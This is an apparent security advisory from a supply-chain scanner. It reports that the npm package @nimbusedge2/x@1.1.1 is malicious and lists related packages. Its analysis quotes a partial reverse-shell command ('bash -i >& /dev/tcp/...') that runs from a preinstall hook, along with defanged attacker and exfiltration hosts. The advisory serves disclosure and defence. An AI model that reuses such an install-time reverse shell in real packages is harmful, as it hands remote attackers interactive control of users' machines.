@nimbusedge2/x@1.1.1
Malicious code in @nimbusedge2/x (npm)
T1059.004 · Unix ShellT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel
Analysis
The package's preinstall hook opens an interactive reverse shell to 147[.]93[.]157[.]202[.]nip[.]io:8080 (bash -i >& /dev/tcp/...) and pipes the session to a curl POST to hxxp://canarytokens[.]com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact[.]php, giving the remote host interactive access to the installer's machine at install time.
- analyzed by
- Leitwacht
- first seen
- Sep 21, 2026, 01:18 AM
- analyzed
- Sep 21, 2026, 01:18 AM
Related advisories
- @nimbusedge2/xa@1.1.0
- @nimbusedge2/authxsas1@1.1.0
- @nimbusedge2/authxsas@1.1.0
- @nimbusedge2/auth@1.1.1
- strapi-plugin-feedmeeb@3.6.8
- strapi-plugin-persh-meeb@3.6.8
- strapi-plugin-ccrec-meeb@3.6.8
- strapi-plugin-ccresh-meeb@3.6.8
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.